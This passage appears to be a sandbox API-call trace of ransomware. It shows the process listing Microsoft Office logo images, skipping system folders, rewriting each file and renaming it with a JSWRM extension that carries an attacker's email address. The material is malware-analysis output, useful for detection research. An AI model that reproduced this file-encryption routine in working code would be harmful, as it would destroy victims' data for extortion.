(lpString1="ExcelLogo.scale-180.png", lpString2="...") returned 1 [0132.426] lstrcmpiW (lpString1="ExcelLogo.scale-180.png", lpString2="windows") returned -1 [0132.426] lstrcmpiW (lpString1="ExcelLogo.scale-180.png", lpString2="recovery") returned -1 [0132.426] lstrcmpiW (lpString1="ExcelLogo.scale-180.png", lpString2="perflogs") returned -1 [0132.426] lstrcmpiW (lpString1="ExcelLogo.scale-180.png", lpString2="documents and settings") returned 1 [0132.426] lstrcmpiW (lpString1="ExcelLogo.scale-180.png", lpString2="$RECYCLE.BIN") returned 1 [0132.426] lstrcmpiW (lpString1="ExcelLogo.scale-180.png", lpString2="system volume information") returned -1 [0132.426] lstrcmpiW (lpString1="ExcelLogo.scale-180.png", lpString2="msocache") returned -1 [0132.426] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelLogo.scale-180.png", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0132.426] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelLogo.scale-180.png", cchWideChar=23, lpMultiByteStr=0x240f48, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExcelLogo.scale-180.png", lpUsedDefaultChar=0x0) returned 23 [0132.426] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelLogo.scale-180.png", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0132.426] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelLogo.scale-180.png", cchWideChar=23, lpMultiByteStr=0x2410d8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExcelLogo.scale-180.png", lpUsedDefaultChar=0x0) returned 23 [0132.426] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.426] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0132.426] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\ExcelLogo.scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\excellogo.scale-180.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0132.427] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3530) returned 1 [0132.427] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.427] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xdc0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0xdc0, lpOverlapped=0x0) returned 1 [0132.429] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.429] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xdc0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0xdc0, lpOverlapped=0x0) returned 1 [0132.430] CloseHandle (hObject=0x238) returned 1 [0132.430] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\ExcelLogo.scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\excellogo.scale-180.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\ExcelLogo.scale-180.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\excellogo.scale-180.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0132.431] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x198d5bc7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x198d5bc7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x198d5bc7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x839, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="ExcelLogo.scale-80.png", cAlternateFileName="EXDA38~1.PNG")) returned 1 [0132.431] lstrcmpiW (lpString1="ExcelLogo.scale-80.png", lpString2=".") returned 1 [0132.431] lstrcmpiW (lpString1="ExcelLogo.scale-80.png", lpString2="..") returned 1 [0132.431] lstrcmpiW (lpString1="ExcelLogo.scale-80.png", lpString2="...") returned 1 [0132.431] lstrcmpiW (lpString1="ExcelLogo.scale-80.png", lpString2="windows") returned -1 [0132.431] lstrcmpiW (lpString1="ExcelLogo.scale-80.png", lpString2="recovery") returned -1 [0132.431] lstrcmpiW (lpString1="ExcelLogo.scale-80.png", lpString2="perflogs") returned -1 [0132.431] lstrcmpiW (lpString1="ExcelLogo.scale-80.png", lpString2="documents and settings") returned 1 [0132.431] lstrcmpiW (lpString1="ExcelLogo.scale-80.png", lpString2="$RECYCLE.BIN") returned 1 [0132.431] lstrcmpiW (lpString1="ExcelLogo.scale-80.png", lpString2="system volume information") returned -1 [0132.431] lstrcmpiW (lpString1="ExcelLogo.scale-80.png", lpString2="msocache") returned -1 [0132.431] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelLogo.scale-80.png", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0132.431] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelLogo.scale-80.png", cchWideChar=22, lpMultiByteStr=0x240fc0, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExcelLogo.scale-80.png", lpUsedDefaultChar=0x0) returned 22 [0132.431] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelLogo.scale-80.png", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0132.431] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelLogo.scale-80.png", cchWideChar=22, lpMultiByteStr=0x241178, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExcelLogo.scale-80.png", lpUsedDefaultChar=0x0) returned 22 [0132.431] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.431] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0132.431] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\ExcelLogo.scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\excellogo.scale-80.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0132.432] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2105) returned 1 [0132.432] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.432] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x830, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x830, lpOverlapped=0x0) returned 1 [0132.433] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.434] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x830, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x830, lpOverlapped=0x0) returned 1 [0132.434] CloseHandle (hObject=0x238) returned 1 [0132.434] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\ExcelLogo.scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\excellogo.scale-80.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\ExcelLogo.scale-80.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\excellogo.scale-80.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0132.435] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a8c7801, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a8c7801, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a8c7801, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x721, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="ExcelLogoSmall.contrast-black_scale-100.png", cAlternateFileName="EX71FE~1.PNG")) returned 1 [0132.435] lstrcmpiW (lpString1="ExcelLogoSmall.contrast-black_scale-100.png", lpString2=".") returned 1 [0132.435] lstrcmpiW (lpString1="ExcelLogoSmall.contrast-black_scale-100.png", lpString2="..") returned 1 [0132.435] lstrcmpiW (lpString1="ExcelLogoSmall.contrast-black_scale-100.png", lpString2="...") returned 1 [0132.435] lstrcmpiW (lpString1="ExcelLogoSmall.contrast-black_scale-100.png", lpString2="windows") returned -1 [0132.435] lstrcmpiW (lpString1="ExcelLogoSmall.contrast-black_scale-100.png", lpString2="recovery") returned -1 [0132.435] lstrcmpiW (lpString1="ExcelLogoSmall.contrast-black_scale-100.png", lpString2="perflogs") returned -1 [0132.435] lstrcmpiW (lpString1="ExcelLogoSmall.contrast-black_scale-100.png", lpString2="documents and settings") returned 1 [0132.435] lstrcmpiW (lpString1="ExcelLogoSmall.contrast-black_scale-100.png", lpString2="$RECYCLE.BIN") returned 1 [0132.435] lstrcmpiW (lpString1="ExcelLogoSmall.contrast-black_scale-100.png", lpString2="system volume information") returned -1 [0132.435] lstrcmpiW (lpString1="ExcelLogoSmall.contrast-black_scale-100.png", lpString2="msocache") returned -1 [0132.435] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelLogoSmall.contrast-black_scale-100.png", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0132.435] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelLogoSmall.contrast-black_scale-100.png", cchWideChar=43, lpMultiByteStr=0x22d0d8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExcelLogoSmall.contrast-black_scale-100.png", lpUsedDefaultChar=0x0) returned 43 [0132.435] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelLogoSmall.contrast-black_scale-100.png", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0132.435] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelLogoSmall.contrast-black_scale-100.png", cchWideChar=43, lpMultiByteStr=0x22cdc8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExcelLogoSmall.contrast-black_scale-100.png", lpUsedDefaultChar=0x0) returned 43 [0132.435] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.435] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0132.435] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\ExcelLogoSmall.contrast-black_scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\excellogosmall.contrast-black_scale-100.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0132.436] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1825) returned 1 [0132.436] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.436] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x720, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x720, lpOverlapped=0x0) returned 1 [0132.438] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.438] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x720, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x720, lpOverlapped=0x0) returned 1 [0132.438] CloseHandle (hObject=0x238) returned 1 [0132.438] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\ExcelLogoSmall.contrast-black_scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\excellogosmall.contrast-black_scale-100.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\ExcelLogoSmall.contrast-black_scale-100.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\excellogosmall.contrast-black_scale-100.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0132.439] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a723def, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a723def, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a723def, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x816, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="ExcelLogoSmall.contrast-black_scale-140.png", cAlternateFileName="EXCE73~1.PNG")) returned 1 [0132.439] lstrcmpiW (lpString1="ExcelLogoSmall.contrast-black_scale-140.png", lpString2=".") returned 1 [0132.440] lstrcmpiW (lpString1="ExcelLogoSmall.contrast-black_scale-140.png", lpString2="..") returned 1 [0132.440] lstrcmpiW (lpString1="ExcelLogoSmall.contrast-black_scale-140.png", lpString2="...") returned 1 [0132.440] lstrcmpiW (lpString1="ExcelLogoSmall.contrast-black_scale-140.png", lpString2="windows") returned -1 [0132.440] lstrcmpiW (lpString1="ExcelLogoSmall.contrast-black_scale-140.png", lpString2="recovery") returned -1 [0132.440] lstrcmpiW (lpString1="ExcelLogoSmall.contrast-black_scale-140.png", lpString2="perflogs") returned -1 [0132.440] lstrcmpiW (lpString1="ExcelLogoSmall.contrast-black_scale-140.png", lpString2="documents and settings") returned 1 [0132.440] lstrcmpiW (lpString1="ExcelLogoSmall.contrast-black_scale-140.png", lpString2="$RECYCLE.BIN") returned 1 [0132.440] lstrcmpiW (lpString1="ExcelLogoSmall.contrast-black_scale-140.png", lpString2="system volume information") returned -1 [0132.440] lstrcmpiW (lpString1="ExcelLogoSmall.contrast-black_scale-140.png", lpString2="msocache") returned -1 [0132.440] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelLogoSmall.contrast-black_scale-140.png", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0132.440] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelLogoSmall.contrast-black_scale-140.png", cchWideChar=43, lpMultiByteStr=0x22d0d8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExcelLogoSmall.contrast-black_scale-140.png", lpUsedDefaultChar=0x0) returned 43 [0132.440] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelLogoSmall.contrast-black_scale-140.png", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0132.440] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelLogoSmall.contrast-black_scale-140.png", cchWideChar=43, lpMultiByteStr=0x22cdc8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExcelLogoSmall.contrast-black_scale-140.png", lpUsedDefaultChar=0x0) returned 43 [0132.440] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.440] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0132.440] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\ExcelLogoSmall.contrast-black_scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\excellogosmall.contrast-black_scale-140.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0132.441] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2070) returned 1 [0132.441] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.441] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x810, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x810, lpOverlapped=0x0) returned 1 [0132.442] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.442] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x810, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x810, lpOverlapped=0x0) returned 1 [0132.442] CloseHandle (hObject=0x238) returned 1 [0132.443] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\ExcelLogoSmall.contrast-black_scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\excellogosmall.contrast-black_scale-140.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\ExcelLogoSmall.contrast-black_scale-140.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\excellogosmall.contrast-black_scale-140.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0132.444] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x198fbe19, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x198fbe19, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1992206f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xa37, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="ExcelLogoSmall.contrast-black_scale-180.png", cAlternateFileName="EX8CA4~1.PNG")) returned 1 [0132.444] lstrcmpiW (lpString1="ExcelLogoSmall.contrast-black_scale-180.png", lpString2=".") returned 1 [0132.444] lstrcmpiW (lpString1="ExcelLogoSmall.contrast-black_scale-180.png", lpString2="..") returned 1 [0132.444] lstrcmpiW (lpString1="ExcelLogoSmall.contrast-black_scale-180.png", lpString2="...") returned 1 [0132.444] lstrcmpiW (lpString1="ExcelLogoSmall.contrast-black_scale-180.png", lpString2="windows") returned -1 [0132.444] lstrcmpiW (lpString1="ExcelLogoSmall.contrast-black_scale-180.png", lpString2="recovery") returned -1 [0132.444] lstrcmpiW (lpString1="ExcelLogoSmall.contrast-black_scale-180.png", lpString2="perflogs") returned -1 [0132.444] lstrcmpiW (lpString1="ExcelLogoSmall.contrast-black_scale-180.png", lpString2="documents and settings") returned 1 [0132.444] lstrcmpiW (lpString1="ExcelLogoSmall.contrast-black_scale-180.png", lpString2="$RECYCLE.BIN") returned 1 [0132.444] lstrcmpiW (lpString1="ExcelLogoSmall.contrast-black_scale-180.png", lpString2="system volume information") returned -1 [0132.444] lstrcmpiW (lpString1="ExcelLogoSmall.contrast-black_scale-180.png", lpString2="msocache") returned -1 [0132.444] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelLogoSmall.contrast-black_scale-180.png", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0132.444] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelLogoSmall.contrast-black_scale-180.png", cchWideChar=43, lpMultiByteStr=0x22d0d8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExcelLogoSmall.contrast-black_scale-180.png", lpUsedDefaultChar=0x0) returned 43 [0132.444] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelLogoSmall.contrast-black_scale-180.png", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0132.444] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelLogoSmall.contrast-black_scale-180.png", cchWideChar=43, lpMultiByteStr=0x22d260, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExcelLogoSmall.contrast-black_scale-180.png", lpUsedDefaultChar=0x0) returned 43 [0132.444] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.444] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0132.444] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\ExcelLogoSmall.contrast-black_scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\excellogosmall.contrast-black_scale-180.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0132.445] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2615) returned 1 [0132.445] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.445] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0xa30, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0xa30, lpOverlapped=0x0) returned 1 [0132.447] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.447] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0xa30, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0xa30, lpOverlapped=0x0) returned 1 [0132.447] CloseHandle (hObject=0x238) returned 1 [0132.447] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\ExcelLogoSmall.contrast-black_scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\excellogosmall.contrast-black_scale-180.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\ExcelLogoSmall.contrast-black_scale-180.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\excellogosmall.contrast-black_scale-180.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0132.448] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x198d5bc7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x198d5bc7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x198fbe19, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x656, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="ExcelLogoSmall.contrast-black_scale-80.png", cAlternateFileName="EX98BE~1.PNG")) returned 1 [0132.448] lstrcmpiW 